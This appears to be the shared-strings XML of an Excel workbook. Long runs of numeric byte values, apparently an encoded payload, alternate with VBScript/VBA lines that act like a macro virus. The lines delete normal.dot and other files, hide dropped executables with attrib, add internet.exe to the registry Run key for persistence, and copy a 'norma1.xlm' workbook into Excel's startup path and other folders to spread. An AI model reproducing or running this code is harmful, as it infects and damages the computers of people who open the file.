    <t xml:space="preserve">227 5 153 77 156 236 48 219 171 48 62 46 126 121 115 203 91 206 24 84 245 135 55 99 80 143 140 233 20 26 187 100 226 102 43 95 73 72 255 165 185 40 240 181 137 47 117 100 222 154 77 151 244 128 123 180 109 30 143 79 144 157 227 204 251 206 134 248 251 20 175 32 90 59 60 80 79 8 234 113 107 47 131 183 19 79 200 246 242 220 174 252 246 185 119 100 109 247 91 42 205 234 134 204 147 178 203 109 66 214 22 14 57 83 59 25 100 116 5 227 217 39 115 253 49 40 143 167 203 163 15 141 237 43 20 147 169 132 121 71 66 3 136 50 205 35 156 65 56 139 176 128 112 14 225 60 194 5 132 139 8 151 16 46 35 44 34 92 65 184 138 144 189 173 212 77 46 108 31 86 244 104 94 239 105 83 123 147 148 150 242 110 150 88 123 216 207 194 122 136 33 231 172 87 243 242 103 224 233 130 70 143 33 157 165 31 52 209 225 201 209 245 183 116 57 141 72 218 66 244 118 251 27 218 136 111 29 254 77 125 75 15 227 143 201 181 207 36 15 152 51 80 174 29 54 250 42 202 85 53 245 3 188 117 5 211 71 108 114 5 187 131 122 85 100 119 152 125 218 219 113 136 45 221 130 79 235 23 246 227 193 21 38 58 47 151 253 182 176 189 220 89 175 6 227 62 13 38 16 38 17 166 16 166 17 14 35 28 65 152 65 56 129 144 221 117 82 252 26 127 239 91 235 251 42 231 227 93 27 31 73 191 198 247 178 141 111 51 63 203 8 139 8 87 16 174 34 92 67 184 142 112 131 243 195 116 223 86 31 231 99 94 32 15 198 119 193 33 253 140 3 61 39 40 103 6 235 207 251 17 71 56 139 176 224 39 120 136 218 184 42 145 224 54 92 182 206 85 78 116 144 11 33 154 31 9 63 131 120 35 254 85 185 32 139 181 53 196 214 187 180 210 194 123 3 3 222 178 221 154 162 100 201 237 189 159 229 120 164 111 47 149 200 25 252 129 164 203 41 89 198 101 148 237 188 158 97 240 106 48 75 191 46 49 175 131 2 71 81 137 201 179 200 61 46 204 209 49 108 242 70 172 34 157 61 99 204 32 253 44 63 205 14 158 42 170 245 50 247 184 224 59 </t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t xml:space="preserve">146 177 156 89 217 240 238 128 23 71 224 5 225 203 109 73 90 246 48 15 69 66 247 72 100 49 102 4 97 196 228 113 48 227 220 38 205 114 189 69 184 136 144 219 221 132 100 165 47 216 202 91 66 184 194 117 85 178 198 175 219 232 17 132 49 94 191 100 205 63 135 248 26 175 79 178 242 179 132 120 146 219 69 164 175 241 122 113 94 140 32 84 17 166 17 142 216 230 231 130 13 242 121 151 205 241 96 31 17 38 17 22 16 206 34 204 33 92 244 88 235 205 249 108 237 180 217 177 121 91 60 199 137 223 42 63 30 207 237 96 26 158 86 255 220 203 215 110 220 238 197 253 86 124 209 111 229 139 183 63 226 177 202 129 183 55 46 91 229 188 193 203 183 173 75 178 152 127 6 161 226 101 107 169 111 121 218 200 121 249 91 240 12 250 85 192 7 82 255 194 86 38 151 166 200 212 133 167 240 73 4 164 55 201 241 111 104 222 117 196 215 40 252 25 205 217 41 171 228 29 249 8 121 67 142 195 62 103 132 166 121 139 110 107 131 196 120 91 1 75 181 143 28 148 37 58 155 38 228 169 11 111 146 106 178 252 205 31 124 244 183 155 111 172 196 59 63 211 117 248 240 97 154 67 33 223 94 248 238 143 226 157 143 116 189 73 87 119 236 26 45 92 151 39 29 100 144 230 220 71 146 240 255 97 250 127 32 197 164 49 174 233 11 229 227 45 47 171 33 174 159 70 17 151 31 36 223 121 237 189 95 222 252 89 188 51 221 197 106 91 252 240 251 127 21 239 124 96 219 218 204 117 26 118 125 197 203 183 236 210 202 77 210 15 87 159 175 78 147 113 245 225 129 199 207 143 62 77 3 39 213 246 11 19 23 9 191 16 28 121 170 61 28 12 190 60 48 122 69 146 95 78 188 144 72 36 122 19 195 201 158 227 135 72 36 225 81 78 7 72 84 174 149 58 18 137 190 99 95 124 49 124 237 158 201 75 79 140 78 74 197 200 67 217 209 207 75 95 63 59 58 233 189 50 30 26 131 139 189 202 232 19 147 245 173 195 151 199 199 102 199 63 63 57 74 252 67 99 228 166 114 225 242 213 240 192 153 92 246 18 77 24 109 130 123 167 100 116 122 124 112 252 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t xml:space="preserve">242 197 103 61 114 237 215 7 174 94 153 190 244 244 69 255 243 222 65 79 47 187 112 156 35 236 194 241 249 241 47 168 75 75 171 61 225 224 112 190 45 191 79 133 27 202 95 249 198 227 15 144 236 248 84 188 43 28 124 128 76 169 240 11 245 106 228 211 227 87 174 230 95 63 63 158 147 167 201 179 218 29 81 162 93 18 157 184 68 190 128 183 229 201 208 212 133 209 43 79 61 49 90 117 57 112 81 137 122 107 217 123 43 8 87 133 124 123 215 225 135 47 94 185 24 188 65 238 31 159 186 58 48 122 249 138 55 222 46 157 5 225 7 72 221 139 65 82 1 29 163 208 158 185 174 12 77 143 63 45 165 124 216 113 222 206 244 187 62 232 88 194 123 214 75 187 54 12 239 93 240 228 63 219 184 91 211 32 249 145 206 58 118 21 58 119 56 217 159 205 230 79 166 164 51 103 195 65 239 208 147 254 11 240 2 11 50 53 173 158 96 239 111 73 177 251 181 225 224 95 127 246 10 57 220 63 54 22 14 158 153 90 98 55 163 195 193 211 50 157 181 194 101 31 216 115 245 29 145 29 239 230 35 130 208 57 65 121 162 144 123 189 55 202 172 87 144 247 27 34 143 219 240 173 123 215 228 19 239 234 126 135 162 30 250 123 61 180 162 135 222 215 67 171 122 232 39 122 104 77 15 253 171 30 90 215 67 255 161 135 54 244 208 199 219 248 59 206 146 211 244 59 64 142 210 85 90 47 233 39 135 232 55 65 41 44 196 46 240 30 163 214 145 209 238 100 207 103 192 223 145 68 15 9 203 115 148 210 123 104 232 14 244 119 68 246 51 127 199 218 209 157 251 59 248 62 190 59 255 23 178 182 70 106 130 181 167 15 247 201 246 189 88 168 230 117 89 251 101 18 177 127 36 214 77 200 210 230 37 50 135 113 7 105 202 62 250 87 197 30 89 208 124 93 95 214 246 133 33 221 239 65 231 10 9 79 225 0 63 17 228 43 178 173 127 129 216 252 40 49 201 205 143 18 197 242 166 100 46 159 74 201 72 151 151 196 245 195 60 140 112 24 215 19 35 8 217 179 214 202 154 183 229 98 5 115 155 56 251 139 114 116 134 102 107 22 230 47 98 199 240 91 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">233 223 0 121 21 150 251 109 38 121 20 37 35 207 117 132 229 200 1 160 105 191 205 158 125 178 253 182 234 183 238 195 151 137 177 15 55 211 217 243 179 60 238 57 120 125 230 248 12 198 71 4 242 49 167 155 145 141 179 61 162 248 9 140 47 218 232 75 72 95 116 200 183 138 241 5 135 120 182 130 206 227 91 84 69 241 42 198 143 56 196 167 48 62 233 212 126 140 143 9 218 111 214 147 148 108 172 255 44 237 198 252 105 27 61 139 244 117 91 125 69 164 175 56 240 179 238 113 151 87 196 235 46 175 132 215 93 94 195 94 119 121 101 189 238 242 154 245 150 39 175 12 247 119 121 173 249 11 152 95 33 203 155 102 250 28 210 211 246 254 247 185 235 175 234 115 214 95 176 121 222 95 159 191 195 92 111 220 103 156 115 227 233 205 241 139 62 222 78 99 156 155 227 87 48 126 94 18 183 107 3 227 103 28 226 217 3 98 22 63 225 16 159 150 196 246 96 216 239 46 207 172 191 60 123 80 240 27 229 139 226 115 126 222 126 135 113 41 25 242 73 154 108 171 178 155 192 153 23 216 59 85 104 167 115 45 250 143 246 175 154 254 57 233 159 27 223 195 1 119 190 178 129 173 237 50 235 19 223 95 177 51 70 176 47 10 216 218 29 16 235 241 114 192 93 238 107 1 119 61 78 96 125 27 8 89 3 64 94 8 35 8 99 8 217 217 25 139 93 193 242 237 242 204 40 6 191 34 190 242 24 31 119 136 159 83 182 202 19 246 241 54 185 44 99 186 25 167 246 99 252 132 67 188 82 177 149 79 161 253 195 116 19 21 14 243 84 133 49 110 45 227 149 235 179 36 169 66 187 91 33 30 79 115 21 238 253 186 84 225 220 175 161 154 77 72 231 113 93 95 220 75 34 65 126 202 143 157 8 14 144 71 200 13 201 190 222 74 4 157 215 23 150 126 64 126 84 187 92 130 238 227 98 38 232 62 255 207 7 13 253 18 214 139 241 41 167 254 15 26 124 137 226 217 195 112 81 191 169 72 111 165 57 45 227 5 253 33 241 74 113 121 35 149 238 122 157 171 20 235 53 227 211 210 255 149 238 227 103 169 210 221 78 174 58 212 195 218 5 245 33 92 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">175 180 217 255 80 121 118 58 133 233 98 145 242 236 99 58 228 108 255 220 242 229 66 70 255 236 36 223 234 14 234 19 218 235 144 120 92 174 35 93 218 233 252 128 249 192 207 111 182 15 72 103 39 198 202 41 103 162 106 171 60 96 253 97 211 159 5 93 110 214 250 102 28 218 181 22 18 143 131 76 149 56 125 50 188 115 249 10 199 127 149 251 120 153 175 114 183 31 139 97 49 223 171 152 143 249 43 133 235 255 106 172 215 33 126 216 161 221 169 42 231 118 91 250 169 154 235 201 206 244 189 80 237 62 174 23 171 157 199 167 112 220 85 185 151 151 172 22 183 83 141 148 103 7 178 38 126 44 227 182 122 251 113 107 225 51 44 230 99 62 178 253 190 192 178 174 8 25 251 12 203 120 136 24 227 214 82 126 104 171 126 149 83 79 170 102 107 251 44 242 195 114 153 255 219 34 23 204 151 112 88 95 23 48 126 201 65 47 23 49 126 206 33 126 101 155 242 55 48 62 227 144 63 86 187 53 191 217 223 144 170 181 174 7 22 90 202 180 167 181 238 243 217 108 173 187 29 88 168 117 183 3 75 78 122 28 16 211 217 253 39 70 95 171 117 231 123 161 78 108 95 150 28 236 232 8 166 159 136 150 57 47 132 203 27 103 179 97 99 254 16 197 23 235 202 156 183 111 195 110 151 211 158 88 141 117 255 202 247 23 35 81 155 253 141 226 186 189 190 188 114 215 170 141 245 176 101 126 170 19 219 159 100 212 208 23 203 248 10 139 233 145 250 237 237 140 121 190 213 219 87 111 219 191 163 190 173 218 218 59 227 96 223 178 17 195 111 98 25 167 117 219 247 147 165 252 58 247 125 94 33 138 231 29 234 113 253 103 227 91 169 51 198 159 197 158 70 197 242 157 175 223 25 127 177 168 184 253 51 187 202 211 219 101 135 241 61 131 229 22 109 237 33 40 239 137 6 219 186 32 38 30 207 11 245 134 223 192 50 47 213 138 211 79 212 137 249 73 239 218 234 159 17 206 15 53 198 120 118 243 211 110 39 151 149 50 199 125 220 65 254 115 245 226 126 87 99 229 149 187 24 217 186 206 177 236 155 29 236 239 112 237 206 244 39 130 242 26 177 245 231 72 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">149 88 63 83 187 220 231 19 118 117 221 62 159 84 214 124 91 214 238 104 136 247 205 153 189 116 190 219 124 138 168 181 154 95 62 78 180 115 156 50 250 229 45 114 109 112 151 75 188 94 188 31 40 34 189 80 107 235 103 164 231 119 219 218 111 170 199 98 23 27 140 121 220 98 87 176 221 171 187 111 207 206 43 14 250 164 54 138 237 116 182 113 251 117 171 235 252 23 21 203 107 30 219 233 177 239 115 26 157 199 97 57 246 157 221 121 0 255 215 30 219 184 64 62 216 195 48 11 29 251 199 111 227 99 181 113 103 122 206 94 165 32 180 115 56 30 99 77 219 200 169 78 44 39 181 73 172 39 145 168 88 126 137 104 121 254 120 118 81 13 246 159 77 232 255 70 152 110 178 181 171 209 161 93 77 238 126 174 121 140 159 221 166 221 137 38 135 125 109 83 153 235 34 156 95 146 173 14 243 79 131 216 206 20 145 238 179 201 101 196 166 55 27 141 226 121 36 230 96 127 227 77 92 159 108 254 214 38 177 191 181 216 236 190 190 94 111 118 183 135 145 22 177 191 104 22 251 51 214 130 178 69 24 111 177 173 99 91 118 182 79 155 109 52 158 39 89 232 187 196 253 24 143 137 229 49 130 245 202 118 251 215 226 48 111 71 184 190 111 179 46 119 226 35 34 166 111 132 196 227 43 187 71 76 95 220 83 222 58 97 189 81 220 238 133 38 177 222 172 180 150 167 239 204 33 234 230 23 80 213 173 250 178 19 123 29 105 22 175 179 211 205 226 113 180 209 34 78 79 90 157 253 8 150 113 222 104 221 119 20 246 224 179 30 21 237 185 106 43 183 109 103 250 154 113 232 119 165 77 108 63 35 109 226 254 201 181 149 215 63 202 30 241 124 146 67 122 192 70 95 112 160 175 182 242 241 33 182 223 197 86 155 221 81 141 244 22 251 170 138 231 245 117 147 28 193 94 224 251 54 156 246 169 153 221 98 57 230 99 14 254 31 85 172 23 74 141 216 94 37 218 240 156 99 187 173 222 106 35 61 59 119 205 94 71 52 141 103 64 84 236 63 246 137 202 141 222 172 137 46 155 218 1 207 231 218 209 254 237 197 250 16 38 247 218 236 152 169 61 162 207 108 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">251 206 238 35 172 211 244 49 202 243 90 7 214 219 113 251 247 25 20 202 115 186 93 147 7 60 139 54 181 27 124 61 148 62 71 235 153 52 221 51 224 244 34 165 63 102 186 63 48 215 140 243 63 182 43 221 97 235 175 70 113 63 230 91 197 246 96 166 213 120 174 7 231 228 59 233 218 223 196 71 214 62 254 219 140 125 52 75 191 74 59 44 45 184 79 177 76 233 73 27 221 194 79 91 121 254 221 116 204 221 31 147 111 20 183 43 210 200 199 169 205 46 216 236 87 204 166 79 49 140 207 236 179 205 103 166 245 34 107 223 6 141 143 11 218 61 65 229 23 51 209 101 236 71 208 3 65 250 52 77 239 53 201 123 139 255 95 181 242 203 244 146 151 71 76 249 248 245 206 120 167 22 63 67 225 250 166 153 15 212 23 140 159 167 112 85 112 31 98 2 227 151 40 44 10 238 81 172 116 178 51 100 91 233 240 204 120 211 249 158 209 130 173 29 41 90 142 114 80 59 7 99 30 43 107 7 126 51 238 15 49 222 44 235 210 253 232 199 116 154 23 49 126 217 105 158 137 227 121 17 39 191 65 220 253 249 122 58 238 254 124 125 34 238 190 46 157 137 255 119 119 215 31 219 196 117 199 159 207 151 224 56 118 112 182 132 166 165 148 227 32 228 220 36 23 255 128 214 77 73 57 219 4 2 109 33 77 210 66 85 58 226 36 71 156 226 216 198 103 7 103 16 97 126 148 102 157 170 102 108 101 12 117 40 140 182 66 83 170 25 169 5 166 110 195 29 172 141 186 169 13 157 166 69 85 215 24 198 218 252 179 41 157 250 7 154 42 178 247 238 222 139 125 23 219 165 237 166 85 35 74 190 220 123 239 222 189 123 239 251 253 188 239 187 123 223 207 125 193 251 31 46 255 243 121 149 255 206 228 182 183 109 108 198 63 87 61 191 101 115 207 31 22 141 125 49 203 51 229 100 28 230 176 62 91 53 246 89 157 27 223 152 234 220 254 186 80 157 103 95 146 53 247 60 155 180 222 218 122 108 20 183 111 220 138 231 119 44 39 177 76 99 57 141 229 12 150 55 176 68 116 124 178 158 97 201 232 52 241 66 124 126 59 72 216 240 222 172 134 76 153 22 </t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">248 255 25 248 59 137 211 82 80 142 52 124 61 91 74 194 235 164 121 205 115 40 220 63 9 205 184 164 172 25 253 86 245 115 45 94 87 230 123 62 135 243 195 249 244 13 231 183 230 243 23 107 11 175 107 19 181 95 240 188 150 211 216 73 109 102 252 85 237 172 207 243 254 179 182 176 221 33 186 69 173 221 9 117 74 253 132 227 13 29 27 178 200 49 102 113 191 201 250 95 135 253 16 40 109 118 101 95 225 55 17 47 229 54 218 149 251 250 80 227 199 216 236 89 251 97 112 123 17 5 165 172 255 88 90 234 243 140 63 238 247 150 60 239 217 58 113 62 151 39 63 129 243 13 121 242 71 235 11 227 122 170 190 48 174 167 235 11 227 58 162 217 44 132 235 12 95 24 215 5 190 176 126 117 242 95 126 253 40 219 54 30 135 97 141 125 251 249 220 248 30 230 115 227 101 130 87 175 75 16 110 1 205 122 91 214 13 140 103 55 176 4 24 155 12 88 90 176 172 194 146 193 146 195 210 134 165 171 65 241 55 226 13 234 117 5 153 55 42 168 1 42 65 29 164 88 234 48 117 148 250 144 50 128 220 126 119 182 223 18 132 191 165 170 244 136 124 127 196 239 6 89 229 25 216 1 15 205 206 247 127 12 48 125 77 142 244 86 167 226 7 107 227 124 93 54 181 255 56 87 222 166 246 31 73 186 31 166 27 114 164 31 135 233 55 242 248 99 211 243 210 247 201 247 53 121 51 115 95 69 89 229 199 53 229 59 97 31 191 67 125 64 149 209 43 41 180 211 141 201 49 191 199 249 60 239 121 184 60 235 88 62 55 190 78 216 53 251 113 161 93 29 119 204 247 15 227 142 111 6 222 161 182 229 124 142 100 47 140 87 22 71 97 188 178 57 10 227 85 171 163 48 94 133 29 133 241 106 196 49 31 175 134 157 36 54 25 199 201 59 21 188 250 159 250 223 154 249 144 224 129 203 137 215 15 78 108 23 80 94 206 17 71 47 251 64 57 226 212 171 156 255 217 248 113 210 158 9 44 39 157 10 55 42 137 102 70 127 209 158 232 236 119 92 100 191 52 218 31 157 43 125 238 89 68 86 132 89 11 142 23 71 49 64 249 122 204 0 38 139 231 226 </t>
  </si>
  <si>
    <t>w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">197 231 199 91 223 147 43 209 247 21 67 198 187 114 37 57 111 41 62 188 231 11 105 53 191 193 149 231 230 8 69 95 123 61 79 215 128 32 165 240 198 77 202 218 139 248 225 142 202 252 112 232 139 163 132 111 238 28 212 9 30 28 6 99 242 170 253 69 57 122 245 28 197 129 56 197 176 167 146 44 211 131 163 174 78 128 17 10 69 53 161 104 220 109 88 162 168 166 211 48 61 140 143 81 156 123 230 252 93 252 102 95 191 168 92 39 78 213 128 8 69 180 180 149 206 104 189 172 165 120 181 49 67 162 187 53 209 215 228 88 222 221 5 231 0 84 167 71 24 167 116 114 116 109 17 216 219 220 238 29 2 110 225 67 74 167 138 230 230 52 245 24 230 250 225 3 42 195 175 7 219 67 41 252 123 30 1 145 229 193 10 57 133 225 216 69 105 175 183 69 105 127 86 123 178 163 193 181 108 43 115 209 224 121 218 153 206 42 119 140 150 185 57 229 40 124 18 101 13 244 234 104 242 22 189 58 138 122 84 143 234 45 3 234 143 15 163 56 106 212 226 106 48 45 199 56 23 207 197 186 161 168 115 196 174 132 36 186 111 18 133 157 208 231 226 31 84 215 163 232 138 246 90 69 176 137 47 206 161 79 146 68 189 3 20 117 173 232 159 60 190 248 122 217 209 218 36 253 60 208 182 215 70 161 232 219 204 120 108 237 66 95 89 158 197 209 74 36 170 91 158 149 105 212 111 19 50 193 193 223 97 79 152 129 234 227 194 232 131 59 122 164 221 180 30 179 27 224 235 250 73 255 106 88 65 72 116 125 11 222 237 205 96 233 34 81 245 89 44 28 242 125 96 57 65 118 135 47 80 250 209 45 220 164 208 214 128 240 27 183 41 122 142 119 67 249 177 36 199 113 44 83 88 206 96 217 9 50 253 152 173 103 173 56 63 172 57 127 34 79 52 7 169 119 155 65 45 253 88 198 177 28 193 242 184 70 146 252 105 44 103 72 148 8 158 41 24 44 93 88 218 176 28 193 242 12 150 73 44 227 37 234 153 102 212 168 62 158 198 242 134 70 106 211 73 121 27 62 127 88 35 207 96 57 98 84 95 135 28 19 239 220 64 240 198 168 150 2 150 40 82 2 </t>
  </si>
  <si>
    <t xml:space="preserve">233 188 252 245 240 232 206 128 175 23 125 101 185 6 84 233 107 148 241 48 170 89 49 90 240 49 131 165 95 115 76 234 109 213 72 114 31 51 88 166 73 189 165 153 40 1 178 51 232 24 141 230 111 69 159 199 113 58 98 77 253 58 246 91 12 42 101 92 64 253 134 236 20 245 87 46 187 68 229 110 5 111 80 57 114 95 136 81 239 76 233 124 252 211 226 184 140 67 40 42 1 162 6 226 53 189 181 214 211 50 250 20 19 252 41 85 88 33 8 30 161 232 131 108 150 18 194 254 17 46 81 71 196 146 167 24 227 88 191 147 134 140 158 100 230 179 76 189 41 131 186 60 177 11 98 167 136 118 62 223 252 138 250 57 109 80 250 121 18 159 135 142 243 149 71 229 136 157 85 97 41 148 160 118 101 230 119 178 218 69 84 47 168 252 241 44 59 204 212 75 3 62 30 144 202 97 74 25 173 112 96 152 104 196 39 97 129 127 43 225 149 2 64 2 153 243 78 3 154 70 209 61 104 252 80 212 209 9 120 124 65 99 207 195 37 104 92 75 128 59 22 13 237 64 12 169 224 138 124 165 197 160 169 70 61 82 53 203 218 236 94 123 99 155 203 107 135 101 42 232 115 192 4 30 149 196 8 179 78 220 217 23 20 123 174 128 69 176 77 119 208 87 64 21 173 180 248 91 52 226 0 161 149 254 197 215 187 96 252 178 215 187 239 43 93 15 217 147 90 255 230 235 30 178 51 37 207 35 252 19 207 231 95 245 188 9 100 199 240 172 77 212 77 124 190 194 136 114 148 120 230 114 254 219 192 80 170 248 89 150 44 94 96 52 46 202 247 119 54 81 43 224 121 196 86 138 128 39 20 218 101 7 196 207 201 206 143 83 231 233 249 233 30 1 125 51 5 141 59 193 203 227 88 198 49 14 29 199 114 24 203 51 88 142 148 102 236 111 22 71 33 101 231 79 98 57 161 201 159 204 146 231 160 21 191 123 249 87 55 79 37 25 48 32 107 108 57 76 99 193 169 179 239 95 57 251 198 196 71 23 46 159 30 123 231 237 243 159 158 61 253 218 199 111 93 71 199 175 95 190 252 193 248 95 78 95 68 26 157 128 88 114 144 42 133 51 62 75 81 208 243 80 </t>
  </si>
  <si>
    <r>
      <t>W</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">158 44 24 76 153 246 143 1 42 231 104 144 145 170 6 117 208 14 242 149 170 80 149 82 70 14 102 176 86 94 158 175 77 255 141 250 51 120 51 131 251 41 142 239 39 77 112 205 132 252 158 164 236 225 200 243 187 25 227 132 57 195 70 192 192 217 234 156 172 83 229 240 234 44 236 161 99 122 244 9 122 69 235 23 233 213 169 99 24 241 104 189 71 168 208 147 183 227 227 38 5 87 80 148 69 198 47 19 163 18 199 22 188 103 45 75 141 96 2 183 136 235 99 160 30 254 234 53 165 171 193 221 122 10 158 99 211 175 0 126 216 79 43 64 128 214 201 136 176 39 20 233 225 119 199 250 162 80 139 208 156 96 151 199 191 21 247 3 218 133 157 193 65 204 5 20 64 4 48 196 10 116 248 190 60 248 136 146 113 218 128 215 7 115 235 22 51 154 23 21 118 159 73 124 103 132 237 103 50 107 126 184 96 158 99 227 233 123 61 31 27 79 42 109 31 70 28 60 19 30 159 68 249 129 109 239 122 239 122 143 115 29 112 184 235 221 182 245 238 122 96 183 221 227 170 119 223 235 4 174 122 155 203 102 115 120 18 78 231 189 118 207 234 33 243 62 1 19 242 252 166 221 64 8 121 36 74 52 141 203 132 60 62 154 16 242 136 227 132 144 231 76 185 87 64 108 60 146 88 185 164 3 32 54 30 68 198 99 65 108 60 139 170 189 49 137 65 100 60 223 45 109 110 141 129 174 64 95 55 179 21 246 164 191 121 64 12 70 37 166 211 29 14 51 110 74 15 76 190 36 226 215 41 241 39 202 120 240 115 240 152 47 210 34 6 194 27 169 117 96 91 189 221 108 52 27 143 180 38 154 18 110 196 217 163 91 6 118 108 22 247 32 178 33 208 5 113 136 243 12 62 54 226 11 48 91 129 73 98 138 140 163 86 179 113 227 206 68 9 127 248 61 91 135 191 79 122 218 124 168 100 75 68 167 91 216 142 92 127 137 163 237 214 162 10 22 41 133 5 105 133 142 130 166 102 97 58 252 34 120 164 57 222 71 69 117 15 32 114 156 30 38 140 200 113 54 85 28 46 55 47 180 50 188 55 20 30 124 231 118 179 209 0 87 12 27 150 32 94 159 165 198 </t>
  </si>
  <si>
    <t>thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t xml:space="preserve">208 166 5 116 195 115 149 53 75 3 177 254 153 160 196 57 222 93 86 126 247 239 140 30 238 128 251 46 9 177 236 192 59 3 141 77 172 60 165 200 44 223 108 29 211 6 196 157 98 68 234 8 181 181 192 89 36 81 220 84 243 251 135 106 60 203 168 98 121 62 41 245 46 75 244 247 134 34 131 192 248 168 4 200 156 66 139 61 66 241 195 190 238 72 8 116 12 134 197 198 166 120 32 225 13 245 247 251 130 61 135 54 92 243 93 250 73 71 36 150 120 67 183 61 49 164 127 228 64 115 212 35 238 12 69 68 147 55 32 156 109 59 84 199 120 125 150 96 183 24 112 159 132 160 109 9 136 190 32 24 222 18 100 20 166 163 148 83 138 93 21 62 221 44 198 163 39 159 123 225 16 109 58 220 196 208 1 191 79 146 46 87 173 117 55 186 117 93 165 211 20 91 116 253 193 110 191 78 120 242 97 169 215 19 138 115 128 85 192 148 77 49 43 25 119 119 180 51 88 186 21 172 132 75 122 4 167 128 224 41 32 128 74 93 191 170 83 240 148 62 125 49 85 59 208 245 184 40 209 155 67 244 183 107 153 129 174 230 198 56 56 208 127 48 248 215 238 159 149 13 116 125 178 142 246 46 62 172 107 98 94 106 40 219 145 126 234 246 235 197 155 67 47 221 38 80 27 131 237 85 209 8 39 44 185 218 92 199 176 128 103 173 136 213 200 182 116 5 45 50 163 119 254 195 120 240 68 59 156 176 123 30 20 7 37 134 221 91 5 93 193 3 167 132 98 175 223 7 130 189 50 139 185 27 116 119 139 146 196 196 3 160 77 244 245 108 9 6 6 129 217 184 33 212 17 98 118 127 30 235 235 188 71 140 252 13 108 168 16 152 253 21 246 26 216 184 232 155 223 111 254 33 191 14 244 249 2 161 94 137 139 63 27 88 174 107 79 187 220 146 21 196 77 161 61 79 47 73 173 98 161 141 127 36 129 187 154 56 118 201 181 69 190 209 19 175 46 210 245 172 48 27 125 246 70 179 113 118 41 107 102 63 46 249 173 105 191 35 116 98 127 89 172 108 234 170 45 177 40 81 246 241 134 75 79 184 83 47 235 22 235 103 199 174 141 41 142 255 191 122 133 87 </t>
  </si>
  <si>
    <t>workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <t xml:space="preserve">204 43 95 189 206 94 253 99 247 6 175 126 225 190 131 190 23 118 92 74 63 194 66 40 153 134 88 34 184 250 95 254 53 83 118 240 123 107 129 249 202 14 93 201 172 105 95 247 129 133 109 29 157 145 190 126 238 161 54 176 73 239 5 112 69 42 113 171 86 215 89 24 167 149 159 216 21 19 173 186 180 227 1 134 69 216 245 29 254 205 138 151 13 150 221 147 156 52 18 31 12 187 3 98 100 36 250 202 250 31 23 177 186 63 236 178 242 50 165 212 123 66 135 157 74 214 38 7 194 225 89 250 51 122 246 71 247 89 22 235 130 201 59 91 245 87 215 184 239 159 149 118 204 74 246 225 122 195 107 171 47 174 92 159 216 218 247 248 72 145 157 233 92 83 185 89 2 82 236 173 96 199 182 207 134 36 174 239 207 131 19 79 124 190 203 254 122 121 185 113 35 117 229 190 71 217 232 130 217 35 69 110 122 213 146 133 174 138 133 250 206 247 239 157 26 250 92 226 166 42 167 134 208 207 210 103 238 120 230 147 169 161 242 103 223 91 224 13 85 238 125 242 200 69 106 255 121 106 106 40 189 7 229 86 254 224 79 67 174 41 165 100 234 249 8 103 190 214 228 88 179 244 151 63 253 108 237 243 247 39 78 218 118 181 139 81 19 179 71 88 222 246 11 113 75 215 83 64 236 142 114 44 92 161 39 240 18 189 115 181 131 237 164 196 184 112 132 61 203 118 175 106 220 190 170 136 111 213 217 206 237 225 147 109 177 32 83 73 165 162 204 129 129 132 215 31 225 156 171 172 201 237 187 109 13 235 99 129 200 249 9 16 213 213 185 24 91 29 189 187 218 48 218 229 239 163 131 189 113 211 173 211 99 253 223 255 251 55 79 8 103 195 248 54 0 128 67 75 220 61 11 120 20 229 181 255 206 78 146 77 8 16 32 96 128 16 192 152 38 34 224 238 38 196 4 40 154 39 65 67 2 73 128 180 6 179 175 217 236 146 217 157 237 236 108 30 202 133 160 160 84 107 109 109 125 92 172 138 104 125 85 124 163 96 171 60 228 90 172 124 92 236 245 83 110 189 126 133 214 235 5 175 90 169 168 81 146 157 123 206 63 255 236 108 50 81 1 191 222 246 222 205 </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <charset val="134"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">55 249 223 231 63 231 252 231 127 157 255 159 57 201 246 15 75 207 209 254 225 217 218 31 68 67 28 139 70 155 237 47 94 114 142 245 219 152 237 194 51 173 31 117 137 151 91 244 250 87 146 74 82 1 238 50 192 162 145 92 78 106 72 21 181 228 119 198 246 47 207 218 254 36 218 0 92 48 93 243 251 72 144 200 223 66 200 108 64 127 26 179 203 120 166 245 227 247 65 255 43 241 201 82 203 106 205 189 144 185 143 176 67 130 32 179 208 185 36 155 217 17 155 202 236 152 177 251 155 175 50 247 41 221 46 96 62 179 63 198 194 75 24 60 55 115 211 235 146 237 255 113 100 23 179 87 246 122 234 80 251 101 72 197 134 84 189 165 56 106 213 113 102 26 251 24 42 131 176 36 205 252 157 90 253 135 182 121 208 18 85 58 251 112 246 125 172 140 195 102 46 99 37 211 82 181 183 121 206 79 213 190 62 54 61 85 251 234 214 94 139 102 213 208 194 105 110 5 115 255 55 78 144 50 65 170 145 192 113 12 135 26 230 246 50 247 95 153 59 150 225 212 200 220 91 152 43 130 155 141 254 116 